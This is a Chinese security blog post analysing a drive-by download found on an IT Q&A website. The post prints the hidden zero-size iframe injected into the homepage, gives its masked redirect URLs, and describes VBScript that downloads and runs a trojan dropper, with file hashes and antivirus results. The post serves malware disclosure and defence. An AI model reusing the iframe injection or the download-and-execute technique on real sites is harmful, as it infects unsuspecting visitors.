[07-01-06]打开某IT技术问答网站时自动下载文件sinze.exe/Trojan-Dropper.Win32.Agent.awq

endurer 原创

2007-01-06 第2版 补充 Kaspersky 的反应
2006-12-27 第1版

该网站首页被加入代码：
/-------
...<iframe src=hxxp://www..xj123***.net/ad***/*1***/*1 width=0 height=0 frameborder=0></iframe>
-------/

打开 hxxp://www..xj123***.net/ad***/*1***/*1  会自动转到

hxxp://i***.the***c**.***.cn/*sinze***/sinze.htm

打开这个 sinze.htm 网页，会看到信息：

/-------
就不让你看！气死你 by knel!
-------/

但这只是表面，该网页下面的 VBScript脚本代码会背地里会利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 sinze.exe，保存为 %temp%g0ld.com，并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

sinze.exe 采用 SVKP 1.3x -> Pavol Cerven 加壳。

/-------
文件说明符 : d:/test/sinze.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2006-12-11 4:25:57
修改时间 : 2006-12-11 4:25:58
访问时间 : 2006-12-27 0:0:0
大小 : 424621 字节 414.685 KB
MD5 : 1937f1ba8627794e232db40a11b8ec0f
-------/

瑞星19.03.12对此文件无反应。

由于昨晚南海海域发生地震，多条海底通信光缆中断，无法使用国外网站的多引擎扫描测试…… 

 

Scanned file:   sinze.exe - Infected

sinze.exe - infected by Trojan-Dropper.Win32.Agent.awq Statistics: Known viruses: 256347 Updated: 06-01-2007 File size (Kb): 415 Virus bodies: 1 Files: 1 Warnings: 0 Archives: 0 Suspicious: 0